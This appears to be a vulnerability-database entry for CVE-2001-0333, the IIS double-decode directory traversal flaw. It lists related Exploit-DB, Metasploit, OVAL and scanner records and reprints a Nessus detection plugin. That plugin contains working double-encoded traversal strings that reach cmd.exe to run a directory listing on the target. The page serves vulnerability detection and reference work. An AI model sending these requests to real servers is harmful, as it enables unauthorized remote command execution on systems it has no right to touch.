Vulnerabilities > CVE-2001-0333 - Unspecified vulnerability in Microsoft Internet Information Server

CVSS 0.0 - NONE

Attack vector

UNKNOWN

Attack complexity

UNKNOWN

Privileges required

UNKNOWN

Confidentiality impact

UNKNOWN

Integrity impact

UNKNOWN

Availability impact

UNKNOWN

microsoft

nessus

exploit available

metasploit

NVD

Published: 2001-06-27

Updated: 2024-11-20

Summary

Directory traversal vulnerability in IIS 5.0 and earlier allows remote attackers to execute arbitrary commands by encoding .. (dot dot) and "\" characters twice.

Vulnerable Configurations

Part	Description	Count
Application	Microsoft Microsoft Internet Information Server - Microsoft Internet Information Server 1.0 Microsoft Internet Information Server 2.0 Microsoft Internet Information Server 3.0 Microsoft Internet Information Server 4.0 Microsoft Internet Information Server 5.0	15

Exploit-Db

description	Microsoft IIS/PWS CGI Filename Double Decode Command Execution. CVE-2001-0333. Remote exploit for windows platform
id	EDB-ID:16467
last seen	2016-02-01
modified	2011-01-08
published	2011-01-08
reporter	metasploit
source	https://www.exploit-db.com/download/16467/
title	Microsoft IIS/PWS CGI Filename Double Decode Command Execution

description	MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (6). CVE-2001-0333 . Remote exploit for windows platform
id	EDB-ID:20840
last seen	2016-02-02
modified	2001-05-15
published	2001-05-15
reporter	A.Ramos
source	https://www.exploit-db.com/download/20840/
title	Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution 6

description	MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (7). CVE-2001-0333 . Remote exploit for windows platform
id	EDB-ID:20841
last seen	2016-02-02
modified	2001-05-15
published	2001-05-15
reporter	Gary O'Leary-Steele
source	https://www.exploit-db.com/download/20841/
title	Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution 7

description	MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (8). CVE-2001-0333 . Remote exploit for windows platform
id	EDB-ID:20842
last seen	2016-02-02
modified	2001-05-15
published	2001-05-15
reporter	Roelof
source	https://www.exploit-db.com/download/20842/
title	Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution 8

description	MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (3). CVE-2001-0333 . Remote exploit for windows platform
id	EDB-ID:20837
last seen	2016-02-02
modified	2001-05-15
published	2001-05-15
reporter	Cyrus The Gerat
source	https://www.exploit-db.com/download/20837/
title	Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution 3

description	MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (4). CVE-2001-0333 . Remote exploit for windows platform
id	EDB-ID:20838
last seen	2016-02-02
modified	2001-05-15
published	2001-05-15
reporter	MovAX
source	https://www.exploit-db.com/download/20838/
title	Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution 4

description	MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (1). CVE-2001-0333 . Remote exploit for windows platform
id	EDB-ID:20835
last seen	2016-02-02
modified	2001-05-15
published	2001-05-15
reporter	Filip Maertens
source	https://www.exploit-db.com/download/20835/
title	Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution 1

description	MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (2). CVE-2001-0333 . Remote exploit for windows platform
id	EDB-ID:20836
last seen	2016-02-02
modified	2001-05-16
published	2001-05-16
reporter	HuXfLuX
source	https://www.exploit-db.com/download/20836/
title	Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution 2

description	MS IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (5). CVE-2001-0333 . Remote exploit for windows platform
id	EDB-ID:20839
last seen	2016-02-02
modified	2001-05-15
published	2001-05-15
reporter	Leif Jakob
source	https://www.exploit-db.com/download/20839/
title	Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution 5

Metasploit

description	This module will execute an arbitrary payload on a Microsoft IIS installation that is vulnerable to the CGI double-decode vulnerability of 2001. NOTE: This module will leave a metasploit payload in the IIS scripts directory.
id	MSF:EXPLOIT/WINDOWS/IIS/MS01_026_DBLDECODE
last seen	2020-06-01
modified	2020-05-19
published	2010-07-12
references	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0333 http://marc.info/?l=bugtraq&m=98992056521300&w=2
reporter	Rapid7
source	https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/iis/ms01_026_dbldecode.rb
title	MS01-026 Microsoft IIS/PWS CGI Filename Double Decode Command Execution

Nessus

NASL family	Web Servers
NASL id	IIS_DECODE_BUG.NASL
description	When IIS receives a user request to run a script, it renders the request in a decoded canonical form, and then performs security checks on the decoded request. A vulnerability results because a second, superfluous decoding pass is performed after the initial security checks are completed. Thus, a specially crafted request could allow an attacker to execute arbitrary commands on the IIS Server.
last seen	2020-06-01
modified	2020-06-02
plugin id	10671
published	2001-05-15
reporter	This script is Copyright (C) 2001-2018 Matt Moore / H D Moore
source	https://www.tenable.com/plugins/nessus/10671
title	MS01-026 / MS01-044: Microsoft IIS Remote Command Execution (uncredentialed check)
code	# # This script was modified Matt Moore ([email protected]) # from the NASL script to test for the UNICODE directory traversal # vulnerability, originally written by Renaud Deraison. # # Then Renaud took Matt's script and used H D Moore modifications # to iis_dir_traversal.nasl ;) # # Changes by Tenable: # - Touched up description (11/04/10) # - Add MSKB script_xref (8/29/17) include("compat.inc"); if (description) { script_id(10671); script_version("1.62"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12"); script_cve_id("CVE-2001-0333", "CVE-2001-0507"); script_bugtraq_id(2708, 3193); script_xref(name:"MSFT", value:"MS01-026"); script_xref(name:"MSFT", value:"MS01-044"); script_xref(name:"MSKB", value:"288855"); script_xref(name:"MSKB", value:"293826"); script_xref(name:"MSKB", value:"294370"); script_xref(name:"MSKB", value:"294774"); script_xref(name:"MSKB", value:"295534"); script_xref(name:"MSKB", value:"297860"); script_xref(name:"MSKB", value:"298340"); script_xref(name:"MSKB", value:"301625"); script_xref(name:"MSKB", value:"304867"); script_xref(name:"MSKB", value:"305359"); script_name(english:"MS01-026 / MS01-044: Microsoft IIS Remote Command Execution (uncredentialed check)"); script_summary(english:"Determines if arbitrary commands can be executed"); script_set_attribute(attribute:"synopsis", value:"Arbitrary commands can be executed on the remote web server."); script_set_attribute(attribute:"description", value: "When IIS receives a user request to run a script, it renders the request in a decoded canonical form, and then performs security checks on the decoded request. A vulnerability results because a second, superfluous decoding pass is performed after the initial security checks are completed. Thus, a specially crafted request could allow an attacker to execute arbitrary commands on the IIS Server."); script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2001/ms01-026"); script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2001/ms01-044"); script_set_attribute(attribute:"solution", value:"Microsoft has released a set of patches for IIS 4.0 and 5.0."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'MS01-026 Microsoft IIS/PWS CGI Filename Double Decode Command Execution'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_set_attribute(attribute:"vuln_publication_date", value:"2001/05/15"); script_set_attribute(attribute:"patch_publication_date", value:"2001/05/15"); script_set_attribute(attribute:"plugin_publication_date", value:"2001/05/15"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:microsoft:iis"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2001-2020 Matt Moore / H D Moore"); script_family(english:"Web Servers"); script_dependencie("find_service1.nasl", "http_version.nasl", "www_fingerprinting_hmap.nasl"); script_require_ports("Services/www", 80); exit(0); } include("global_settings.inc"); include("http_func.inc"); include("http_keepalive.inc"); port = get_http_port(default:80, embedded:TRUE); banner = get_http_banner(port:port); if ( "IIS" >!< banner ) exit(0); if ( banner =~ "Microsoft-IIS/[6-9]" ) exit(0); if(!get_port_state(port))exit(0); dir[0] = "/scripts/"; dir[1] = "/msadc/"; dir[2] = "/iisadmpwd/"; dir[3] = "/_vti_bin/"; # FP dir[4] = "/_mem_bin/"; # FP dir[5] = "/exchange/"; # OWA dir[6] = "/pbserver/"; # Win2K dir[7] = "/rpc/"; # Win2K dir[8] = "/cgi-bin/"; dir[9] = "/"; uni[0] = "%255c"; dots[0] = ".."; uni[1] = "%%35c"; dots[1] = ".."; uni[2] = "%%35%63"; dots[2] = ".."; uni[3] = "%25%35%63"; dots[3] = ".."; uni[4] = "%252e"; dots[4] = "/."; function check(req) { local_var r, pat, pat2; r = http_keepalive_send_recv(port:port, data:http_get(item:req, port:port)); if(r == NULL) { exit(0); } pat = "<DIR>"; pat2 = "Directory of C"; if((pat >< r) \|\| (pat2 >< r)){ security_hole(port:port, extra: strcat('\n Requesting\n ', build_url(port: port, qs: req), '\n produces :\n\n', r)); return(1); } return(0); } cmd = "/winnt/system32/cmd.exe?/c+dir+c:\\+/OG"; for(d=0;dir[d];d=d+1) { for(i=0;uni[i];i=i+1) { url = string(dir[d], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], cmd); if(check(req:url))exit(0); } } # Slight variation- do the same, but don't put dots[i] in front # of cmd (reported on vuln-dev) for(d=0;dir[d];d=d+1) { for(i=0;uni[i];i=i+1) { url = string(dir[d], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], cmd); if(check(req:url))exit(0); } }

Oval

accepted

2007-08-02T14:47:14.863-04:00

class

vulnerability

contributors

name Christine Walzer
organization The MITRE Corporation
name Robert L. Hollis
organization ThreatGuard, Inc.

description

Directory traversal vulnerability in IIS 5.0 and earlier allows remote attackers to execute arbitrary commands by encoding .. (dot dot) and "\" characters twice.

family

windows

oval:org.mitre.oval:def:1018

status

accepted

submitted

2004-05-12T12:00:00.000-04:00

title

Windows NT IIS Directory Traversal Command Execution (Test 2)

version

accepted

2004-06-30T12:00:00.000-04:00

class

vulnerability

contributors

name	Christine Walzer
organization	The MITRE Corporation

description

Directory traversal vulnerability in IIS 5.0 and earlier allows remote attackers to execute arbitrary commands by encoding .. (dot dot) and "\" characters twice.

family

windows

oval:org.mitre.oval:def:1051

status

accepted

submitted

2004-05-12T12:00:00.000-04:00

title

Windows 2000 IIS Directory Traversal Command Execution (Test 2)

version

accepted

2016-02-08T10:00:00.000-05:00

class

vulnerability

contributors

name	Tiffany Bergeron
organization	The MITRE Corporation

description

Directory traversal vulnerability in IIS 5.0 and earlier allows remote attackers to execute arbitrary commands by encoding .. (dot dot) and "\" characters twice.

family

windows

oval:org.mitre.oval:def:37

status

accepted

submitted

2003-10-10T12:00:00.000-04:00

title

Windows NT IIS Directory Traversal Command Execution (Test 1)

version

accepted

2011-05-16T04:03:27.809-04:00

class

vulnerability

contributors

name Tiffany Bergeron
organization The MITRE Corporation
name Tiffany Bergeron
organization The MITRE Corporation
name Shane Shaffer
organization G2, Inc.
name Sudhir Gandhe
organization Telos
name Shane Shaffer
organization G2, Inc.

description

Directory traversal vulnerability in IIS 5.0 and earlier allows remote attackers to execute arbitrary commands by encoding .. (dot dot) and "\" characters twice.

family

windows

oval:org.mitre.oval:def:78

status

accepted

submitted

2003-10-10T12:00:00.000-04:00

title

Windows 2000 IIS Directory Traversal Command Execution (Test 1)

version

Packetstorm

data source	https://packetstormsecurity.com/files/download/89962/ms01_026_dbldecode.rb.txt
id	PACKETSTORM:89962
last seen	2016-12-05
published	2010-05-26
reporter	jduck
source	https://packetstormsecurity.com/files/89962/Microsoft-IIS-PWS-CGI-Filename-Double-Decode-Command-Execution.html
title	Microsoft IIS/PWS CGI Filename Double Decode Command Execution

data source	https://packetstormsecurity.com/files/download/24846/sa2001_02.txt
id	PACKETSTORM:24846
last seen	2016-12-05
published	2001-05-17
reporter	nsfocus.com
source	https://packetstormsecurity.com/files/24846/sa2001_02.txt.html
title	sa2001_02.txt

Saint

bid	2708
description	IIS Double Decoding Directory Traversal
id	web_server_iis_double
osvdb	556
title	iis_double_decode
type	remote

Summary

Vulnerable Configurations

Exploit-Db

Metasploit

Nessus

Oval

Packetstorm

Saint

References